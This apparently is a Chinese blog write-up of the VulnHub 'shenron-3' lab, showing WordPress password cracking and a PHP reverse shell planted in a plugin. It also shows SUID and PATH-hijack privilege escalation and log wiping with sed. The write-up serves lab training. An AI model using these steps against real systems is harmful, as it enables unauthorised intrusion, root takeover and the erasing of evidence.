vulnhub靶场【shenron】之3

ops/2024/12/19 2:49:52/

前言

靶机:shenron-3

攻击:kali

都采用虚拟机,网卡为桥接模式

主机发现

使用arp-scan -l或者netdiscover -r 192.168.1.1/24即可

信息收集

使用nmap扫描端口

网站探测

访问网站,发现可能是wordpress,而且经过前面shenron-2靶机后,显示与前面相似,可能需要域名解析

查看页面源代码确定为目录下网站,且有脚本语言php

使用gobuster、ffuf、dirsearch、dirb、dirbuster等工具进行目录扫描

gobuster dir -u http://192.168.1.57 -w /usr/share/wordlists/dirb/big.txt -x php,zip,md,txt,html,jpg -b 404

访问http://192.168.1.57/wp-admin发现,进行跳转,需要进行域名绑定

编辑/etc/hosts文件,添加一条映射即可

使用whateweb进行指纹识别

结合目前信息来看,确定为wordpress,那么使用针对wordpress的扫描工具wpscan

wpscan --url http://192.168.1.57

尝试枚举用户

漏洞寻找

结合字典,尝试枚举出用户名及密码,发现用户名admin以及密码iloverockyou

也可以找wordpress的版本漏洞,使用searchsploit进行搜索

searchsploit wordpress core 4.6

分析所需要的

  • 第一个远程代码执行,这个可以
  • 第二个用户名枚举,不过这里以得知一个用户
  • 第三个未授权密码重置,也是可以
  • 第四个需要认证,那不行
  • 第五个可能是查看未授权的一些文件吧
  • 第六个拒绝服务

第一个远程代码执行脚本,需要开启phpmail,但是这里并没有开启,因为在测试忘记密码时的一个邮件发送,并没有找到,所以不行

第二个暂且不枚举,因为已知一个admin

第三个也是需要开启mail,不行

ok,那就算了吧,再试都曲中人散了。

漏洞利用

直接使用上面枚举出的用户名和密码登录,OK,完全可以登录

那么查看插件plugins,是否可以更改,毕竟这里的插件的PHP语言

发现一个hello dolly插件,把这个插件启用,该插件就是在页面右上角打招呼的,直接修改代码,插入kali自带的反弹php,在/usr/share/webshells/php/php-reverse-shell.php,然后在kali开启监听

使用dpkg -l | grep python查看有无安装python,确定为python3

获取交互式界面

python3 -c 'import pty;pty.spawn("/bin/bash")'

靶机内信息收集

使用find寻找SUID和capabilities

find / -perm -u=s -type f 2>/dev/null
find / -type f -executable 2>/dev/null | xargs getcap -r 2>/dev/null

查看用户情况

查看网络状态,以及系统内核版本

查看定时任务

提权

收集一圈,未发现可用,那就把收集到的密码进行切换用户测试,最终测试成功,与爆出的密码一致

查看家目录

好嘛,这直接发现一个SUID权限的可执行文件network,执行发现,这很像是netstat,并且测试发现,用户的参数并无用处,说明是设置好的,调用这个命令

把这个文件通过python下载到kali分析

靶机执行
python3 -m http.server 9999kali执行
wget http://192.168.1.57/network

kali上使用strings等命令分析

那么更改环境变量,创建一个同名的文件,最好在/tmp目录

cd /tmp
echo /bin/bash > netstat
export PATH=/tmp:$PATH
chmod +x netstat

执行上面命令后,即可发现成功

清除痕迹

各种日志清理,一般采用sed抹去与自己ip相关的即可,这里省事直接置空

sed -i "/192.168.1.16/d" auth.log

清除命令历史记录

网站上,把之前的脚本文件内容复原即可

总结

  1. wordpress的一些使用,如xmlrpc.php可能寻找用户名枚举等
  2. 对于枚举的用户进行密码爆破wpscan
  3. 在网站插件插入php的反弹shell,这需要可以在网站进行修改文件的权限
  4. 一码多用的情况
  5. 临时环境变量的提权

http://www.ppmy.cn/ops/143055.html

相关文章

Python 写的《桌面时钟》屏保

原代码: # 日历式时钟 # 导入所需的库 # 作者:Hoye # 日期:2024年12月16日 # 功能:显示当前日期、星期、时间,并显示模拟时钟 import tkinter as tk from tkinter import ttk import time import math import sysdef …

OpenAI直播发布第6天:ChatGPT视频聊天、屏幕共享和圣诞语音包!

大家好,我是木易,一个持续关注AI领域的互联网技术产品经理,国内Top2本科,美国Top10 CS研究生,MBA。我坚信AI是普通人变强的“外挂”,专注于分享AI全维度知识,包括但不限于AI科普,AI工…

社交电商新风口:短视频交友+自营商城源码运营

创新运营中,将短视频交友与自营商城源码融合,确实是一个引领潮流的举措。这种融合不仅为用户提供了一个既能交友互动又能购物的综合性平台,还通过丰富的功能和先进的技术手段,提升了用户体验,增加了用户粘性。以下是对…

Ubuntu环境中安装docker

安装依赖sudo apt update sudo apt install apt-transport-https ca-certificates curl gnupg lsb-release添加阿里云GPG秘钥curl -fsSL http://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg | sudo apt-key add -设置stable仓库sudo add-apt-repository "deb [archamd…

C++打地鼠游戏一小时极限开发

视频:【课设拯救计划/直播回放】C打地鼠游戏一小时极限开发(完整版)_哔哩哔哩_bilibili 创建几个全局变量: IMAGE img_menuBackground; //主菜单背景图 IMAGE img_mole; //地鼠图片 IMAGE img_empty; //坑位图片 IMAGE im…

MR30分布式 IO 模块:硅晶行业电池片导片机的智能 “心脏”

硅晶产业作为全球能源和电子领域的基石,其生产规模庞大且工艺复杂。从硅料的提纯、拉晶,到硅片的切割、电池片的制造,每一个环节都要求高精度与高稳定性。在电池片生产环节,导片机承担着硅片传输与定位的重要任务,其运…

短波红外相机

短波红外相机搭载采用 SenSWIR 技术的 Sony 高灵敏度传感器,能捕获到400nm~1700nm范围的可见光-短波红外宽波段图像信息,该相机可替代传统的“可见光相机短波红外相机”双相机检测方案,降低系统成本、提高处理速度、扩大检测范围,…

opencv Canny边缘检测

canny阈值越高,检测到的边缘数量越少 # 导入OpenCV库,用于图像处理 import cv2 import numpy as np # 从matplotlib库中导入pyplot模块,用于绘制图像 from matplotlib import pyplot as plt # 创建一个名为window的窗口,窗口大小自…